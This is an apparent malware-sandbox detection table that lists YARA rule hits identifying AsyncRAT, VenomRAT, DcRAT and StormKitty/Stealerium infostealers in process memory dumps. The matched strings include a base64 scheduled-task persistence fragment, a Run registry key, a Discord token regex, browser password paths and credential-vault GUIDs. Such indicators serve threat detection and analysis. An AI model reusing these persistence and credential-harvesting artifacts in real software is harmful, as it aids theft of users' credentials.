11.2.RegAsm.exe.525b8a.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x167d18:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x163e8c:$s6: VirtualBox 0x173a0b:$s6: VirtualBox 0x16f428:$s8: Win32_ComputerSystem 0x173971:$s8: Win32_ComputerSystem 0x16c554:$s9: Win32_Process Where ParentProcessID= 0x16c171:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x16c20e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x16c323:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x16c40b:$cnc4: POST / HTTP/1.1
6.2.powershell.exe.623872a.8.raw.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
6.2.powershell.exe.623872a.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.powershell.exe.623872a.8.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.powershell.exe.623872a.8.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
6.2.powershell.exe.623872a.8.raw.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
6.2.powershell.exe.623872a.8.raw.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x11d67e:$a1: havecamera 0x1684a8:$a2: timeout 3 > NUL 0x16b82b:$a3: START "" " 0x16bd40:$a3: START "" " 0x16bc1b:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x16bcb8:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
6.2.powershell.exe.623872a.8.raw.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x16eba2:$str01: Processe: 0x16ea5e:$str02: Compname: 0x16eb58:$str04: SandBoxie: 0x16eaee:$str08: WEBCAMS COUNT: 0x16eb12:$str09: [Virtualization] 0x16f360:$str10: [Open google maps]( 0x170dd7:$str11: Remember password: 0x163eca:$str12: Target.Browsers.Firefox 0x14b645:$str13: Modules.Keylogger 0x153508:$str14: ClipperAddresses 0x1556ad:$str15: ChromiumPswPaths 0x1556bf:$str15: ChromiumPswPaths 0x151602:$str16: DetectedBankingServices 0x15176b:$str17: DetectCryptocurrencyServices 0x15f664:$str18: CheckRemoteDebuggerPresent 0x1605e9:$str19: GetConnectedCamerasCount
6.2.powershell.exe.623872a.8.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x12ebc8:$str01: set_sUsername 0x13c0fa:$str03: set_sExpMonth 0x1514b5:$str04: WritePasswords 0x151f6f:$str05: WriteCookies 0x1556be:$str06: sChromiumPswPaths 0x155699:$str07: sGeckoBrowserPaths 0x16ad45:$str10: encrypted_key":"(.*?)"
6.2.powershell.exe.623872a.8.raw.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x16bcb8:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x167d88:$str04: Pac_ket 0x177ace:$str05: Perfor_mance 0x177b12:$str06: Install_ed 0x12217b:$str07: get_IsConnected 0x138640:$str08: get_ActivatePo_ng 0x14c57b:$str09: isVM_by_wim_temper 0x1783c0:$str10: save_Plugin 0x1684a8:$str11: timeout 3 > NUL 0x1776ae:$str12: ProcessHacker.exe 0x1778a0:$str13: Select * from Win32_CacheMemory
6.2.powershell.exe.623872a.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x16bcb8:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x16bc1b:$s2: L2Mgc2NodGFza3MgL2
6.2.powershell.exe.623872a.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x1778a0:$q1: Select * from Win32_CacheMemory 0x1778e0:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x17792e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x17797c:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.powershell.exe.623872a.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x16fa7c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
6.2.powershell.exe.623872a.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x175417:$s1: \VPN\NordVPN 0x1753fd:$s2: \VPN\OpenVPN 0x1753df:$s3: \VPN\ProtonVPN
6.2.powershell.exe.623872a.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x16a161:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x16a1d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x16a25d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x16a2ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x16a359:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x16a3cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x16a461:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x16a4f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
6.2.powershell.exe.623872a.8.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x167d18:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x163e8c:$s6: VirtualBox 0x173a0b:$s6: VirtualBox 0x16f428:$s8: Win32_ComputerSystem 0x173971:$s8: Win32_ComputerSystem 0x16c554:$s9: Win32_Process Where ParentProcessID= 0x16c171:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x16c20e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x16c323:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x16c40b:$cnc4: POST / HTTP/1.1
6.2.powershell.exe.5e16f80.6.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
6.2.powershell.exe.5e16f80.6.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
6.2.powershell.exe.5e16f80.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.powershell.exe.5e16f80.6.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
6.2.powershell.exe.5e16f80.6.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
6.2.powershell.exe.5e16f80.6.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x23f608:$a1: havecamera 0x28a432:$a2: timeout 3 > NUL 0x28d7b5:$a3: START "" " 0x28dcca:$a3: START "" " 0x28dba5:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x28dc42:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
6.2.powershell.exe.5e16f80.6.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x290b2c:$str01: Processe: 0x2909e8:$str02: Compname: 0x290ae2:$str04: SandBoxie: 0x290a78:$str08: WEBCAMS COUNT: 0x290a9c:$str09: [Virtualization] 0x2912ea:$str10: [Open google maps]( 0x292d61:$str11: Remember password: 0x285e54:$str12: Target.Browsers.Firefox 0x26d5cf:$str13: Modules.Keylogger 0x275492:$str14: ClipperAddresses 0x277637:$str15: ChromiumPswPaths 0x277649:$str15: ChromiumPswPaths 0x27358c:$str16: DetectedBankingServices 0x2736f5:$str17: DetectCryptocurrencyServices 0x2815ee:$str18: CheckRemoteDebuggerPresent 0x282573:$str19: GetConnectedCamerasCount
6.2.powershell.exe.5e16f80.6.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x2fc1fb:$sk01: LimerBoy/StormKitty 0x250b52:$str01: set_sUsername 0x25e084:$str03: set_sExpMonth 0x27343f:$str04: WritePasswords 0x273ef9:$str05: WriteCookies 0x277648:$str06: sChromiumPswPaths 0x277623:$str07: sGeckoBrowserPaths 0x28cccf:$str10: encrypted_key":"(.*?)"
6.2.powershell.exe.5e16f80.6.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x28dc42:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x289d12:$str04: Pac_ket 0x299a58:$str05: Perfor_mance 0x299a9c:$str06: Install_ed 0x244105:$str07: get_IsConnected 0x25a5ca:$str08: get_ActivatePo_ng 0x26e505:$str09: isVM_by_wim_temper 0x29a34a:$str10: save_Plugin 0x28a432:$str11: timeout 3 > NUL 0x299638:$str12: ProcessHacker.exe 0x29982a:$str13: Select * from Win32_CacheMemory
6.2.powershell.exe.5e16f80.6.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x28dc42:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x28dba5:$s2: L2Mgc2NodGFza3MgL2
6.2.powershell.exe.5e16f80.6.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x29982a:$q1: Select * from Win32_CacheMemory 0x29986a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x2998b8:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x299906:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.powershell.exe.5e16f80.6.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x291a06:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
6.2.powershell.exe.5e16f80.6.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2973a1:$s1: \VPN\NordVPN 0x297387:$s2: \VPN\OpenVPN 0x297369:$s3: \VPN\ProtonVPN
6.2.powershell.exe.5e16f80.6.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x28c0eb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x28c15d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x28c1e7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x28c279:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x28c2e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x28c355:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x28c3eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x28c47b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
6.2.powershell.exe.5e16f80.6.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x2fc1e8:$x2: https://github.com/LimerBoy/StormKitty 0x2fc204:$x3: StormKitty 0x27c1f4:$s2: GetAntivirus 0x29225a:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x28b6a5:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x28cccd:$s6: "encrypted_key":"(.*?)"
6.2.powershell.exe.5e16f80.6.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x289ca2:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x285e16:$s6: VirtualBox 0x295995:$s6: VirtualBox 0x2913b2:$s8: Win32_ComputerSystem 0x2958fb:$s8: Win32_ComputerSystem 0x28e4de:$s9: Win32_Process Where ParentProcessID= 0x28e0fb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28e198:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x28e2ad:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x28e395:$cnc4: POST / HTTP/1.1
6.2.powershell.exe.5f3ad0a.7.raw.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
6.2.powershell.exe.5f3ad0a.7.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
6.2.powershell.exe.5f3ad0a.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.powershell.exe.5f3ad0a.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.powershell.exe.5f3ad0a.7.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
6.2.powershell.exe.5f3ad0a.7.raw.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
6.2.powershell.exe.5f3ad0a.7.raw.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x11d67e:$a1: havecamera 0x41b09e:$a1: havecamera 0x1684a8:$a2: timeout 3 > NUL 0x465ec8:$a2: timeout 3 > NUL 0x16b82b:$a3: START "" " 0x16bd40:$a3: START "" " 0x46924b:$a3: START "" " 0x469760:$a3: START "" " 0x16bc1b:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x46963b:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x16bcb8:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x4696d8:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
6.2.powershell.exe.5f3ad0a.7.raw.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x16eba2:$str01: Processe: 0x46c5c2:$str01: Processe: 0x16ea5e:$str02: Compname: 0x46c47e:$str02: Compname: 0x16eb58:$str04: SandBoxie: 0x46c578:$str04: SandBoxie: 0x16eaee:$str08: WEBCAMS COUNT: 0x46c50e:$str08: WEBCAMS COUNT: 0x16eb12:$str09: [Virtualization] 0x46c532:$str09: [Virtualization] 0x16f360:$str10: [Open google maps]( 0x46cd80:$str10: [Open google maps]( 0x170dd7:$str11: Remember password: 0x46e7f7:$str11: Remember password: 0x163eca:$str12: Target.Browsers.Firefox 0x4618ea:$str12: Target.Browsers.Firefox 0x14b645:$str13: Modules.Keylogger 0x449065:$str13: Modules.Keylogger 0x153508:$str14: ClipperAddresses 0x450f28:$str14: ClipperAddresses 0x1556ad:$str15: ChromiumPswPaths
6.2.powershell.exe.5f3ad0a.7.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x1da271:$sk01: LimerBoy/StormKitty 0x12ebc8:$str01: set_sUsername 0x42c5e8:$str01: set_sUsername 0x13c0fa:$str03: set_sExpMonth 0x439b1a:$str03: set_sExpMonth 0x1514b5:$str04: WritePasswords 0x44eed5:$str04: WritePasswords 0x151f6f:$str05: WriteCookies 0x44f98f:$str05: WriteCookies 0x1556be:$str06: sChromiumPswPaths 0x4530de:$str06: sChromiumPswPaths 0x155699:$str07: sGeckoBrowserPaths 0x4530b9:$str07: sGeckoBrowserPaths 0x16ad45:$str10: encrypted_key":"(.?)" 0x468765:$str10: encrypted_key":"(.?)"
6.2.powershell.exe.5f3ad0a.7.raw.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x16bcb8:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x4696d8:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x167d88:$str04: Pac_ket 0x4657a8:$str04: Pac_ket 0x177ace:$str05: Perfor_mance 0x4754ee:$str05: Perfor_mance 0x177b12:$str06: Install_ed 0x475532:$str06: Install_ed 0x12217b:$str07: get_IsConnected 0x41fb9b:$str07: get_IsConnected 0x138640:$str08: get_ActivatePo_ng 0x436060:$str08: get_ActivatePo_ng 0x14c57b:$str09: isVM_by_wim_temper 0x449f9b:$str09: isVM_by_wim_temper 0x1783c0:$str10: save_Plugin 0x475de0:$str10: save_Plugin 0x1684a8:$str11: timeout 3 > NUL 0x465ec8:$str11: timeout 3 > NUL 0x1776ae:$str12: ProcessHacker.exe 0x4750ce:$str12: ProcessHacker.exe 0x1778a0:$str13: Select * from Win32_CacheMemory
6.2.powershell.exe.5f3ad0a.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x16bcb8:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x4696d8:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x16bc1b:$s2: L2Mgc2NodGFza3MgL2 0x46963b:$s2: L2Mgc2NodGFza3MgL2
6.2.powershell.exe.5f3ad0a.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x1778a0:$q1: Select * from Win32_CacheMemory 0x4752c0:$q1: Select * from Win32_CacheMemory 0x1778e0:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x475300:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x17792e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x47534e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x17797c:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x47539c:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.powershell.exe.5f3ad0a.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x16fa7c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x46d49c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
6.2.powershell.exe.5f3ad0a.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x175417:$s1: \VPN\NordVPN 0x472e37:$s1: \VPN\NordVPN 0x1753fd:$s2: \VPN\OpenVPN 0x472e1d:$s2: \VPN\OpenVPN 0x1753df:$s3: \VPN\ProtonVPN 0x472dff:$s3: \VPN\ProtonVPN
6.2.powershell.exe.5f3ad0a.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x16a161:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x467b81:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x16a1d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x467bf3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x16a25d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x467c7d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x16a2ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x467d0f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x16a359:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x467d79:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x16a3cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467deb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x16a461:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x467e81:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x16a4f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x467f11:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
6.2.powershell.exe.5f3ad0a.7.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x1da25e:$x2: https://github.com/LimerBoy/StormKitty 0x1da27a:$x3: StormKitty 0x15a26a:$s2: GetAntivirus 0x457c8a:$s2: GetAntivirus 0x1702d0:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x46dcf0:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x16971b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x46713b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x16ad43:$s6: "encrypted_key":"(.?)" 0x468763:$s6: "encrypted_key":"(.?)"
6.2.powershell.exe.5f3ad0a.7.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x167d18:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x465738:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x163e8c:$s6: VirtualBox 0x173a0b:$s6: VirtualBox 0x4618ac:$s6: VirtualBox 0x47142b:$s6: VirtualBox 0x16f428:$s8: Win32_ComputerSystem 0x173971:$s8: Win32_ComputerSystem 0x46ce48:$s8: Win32_ComputerSystem 0x471391:$s8: Win32_ComputerSystem 0x16c554:$s9: Win32_Process Where ParentProcessID= 0x469f74:$s9: Win32_Process Where ParentProcessID= 0x16c171:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x469b91:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x16c20e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x469c2e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x16c323:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x469d43:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x16c40b:$cnc4: POST / HTTP/1.1 0x469e2b:$cnc4: POST / HTTP/1.1
6.2.powershell.exe.5e16f80.6.raw.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
6.2.powershell.exe.5e16f80.6.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
6.2.powershell.exe.5e16f80.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.powershell.exe.5e16f80.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.powershell.exe.5e16f80.6.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
6.2.powershell.exe.5e16f80.6.raw.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
6.2.powershell.exe.5e16f80.6.raw.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x241408:$a1: havecamera 0x53ee28:$a1: havecamera 0x28c232:$a2: timeout 3 > NUL 0x589c52:$a2: timeout 3 > NUL 0x28f5b5:$a3: START "" " 0x28faca:$a3: START "" " 0x58cfd5:$a3: START "" " 0x58d4ea:$a3: START "" " 0x28f9a5:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x58d3c5:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x28fa42:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x58d462:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
6.2.powershell.exe.5e16f80.6.raw.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x29292c:$str01: Processe: 0x59034c:$str01: Processe: 0x2927e8:$str02: Compname: 0x590208:$str02: Compname: 0x2928e2:$str04: SandBoxie: 0x590302:$str04: SandBoxie: 0x292878:$str08: WEBCAMS COUNT: 0x590298:$str08: WEBCAMS COUNT: 0x29289c:$str09: [Virtualization] 0x5902bc:$str09: [Virtualization] 0x2930ea:$str10: [Open google maps]( 0x590b0a:$str10: [Open google maps]( 0x294b61:$str11: Remember password: 0x592581:$str11: Remember password: 0x287c54:$str12: Target.Browsers.Firefox 0x585674:$str12: Target.Browsers.Firefox 0x26f3cf:$str13: Modules.Keylogger 0x56cdef:$str13: Modules.Keylogger 0x277292:$str14: ClipperAddresses 0x574cb2:$str14: ClipperAddresses 0x279437:$str15: ChromiumPswPaths
6.2.powershell.exe.5e16f80.6.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x5db:$sk01: LimerBoy/StormKitty 0x2fdffb:$sk01: LimerBoy/StormKitty 0x252952:$str01: set_sUsername 0x550372:$str01: set_sUsername 0x25fe84:$str03: set_sExpMonth 0x55d8a4:$str03: set_sExpMonth 0x27523f:$str04: WritePasswords 0x572c5f:$str04: WritePasswords 0x275cf9:$str05: WriteCookies 0x573719:$str05: WriteCookies 0x279448:$str06: sChromiumPswPaths 0x576e68:$str06: sChromiumPswPaths 0x279423:$str07: sGeckoBrowserPaths 0x576e43:$str07: sGeckoBrowserPaths 0x28eacf:$str10: encrypted_key":"(.?)" 0x58c4ef:$str10: encrypted_key":"(.?)"
6.2.powershell.exe.5e16f80.6.raw.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x28fa42:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x58d462:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x28bb12:$str04: Pac_ket 0x589532:$str04: Pac_ket 0x29b858:$str05: Perfor_mance 0x599278:$str05: Perfor_mance 0x29b89c:$str06: Install_ed 0x5992bc:$str06: Install_ed 0x245f05:$str07: get_IsConnected 0x543925:$str07: get_IsConnected 0x25c3ca:$str08: get_ActivatePo_ng 0x559dea:$str08: get_ActivatePo_ng 0x270305:$str09: isVM_by_wim_temper 0x56dd25:$str09: isVM_by_wim_temper 0x29c14a:$str10: save_Plugin 0x599b6a:$str10: save_Plugin 0x28c232:$str11: timeout 3 > NUL 0x589c52:$str11: timeout 3 > NUL 0x29b438:$str12: ProcessHacker.exe 0x598e58:$str12: ProcessHacker.exe 0x29b62a:$str13: Select * from 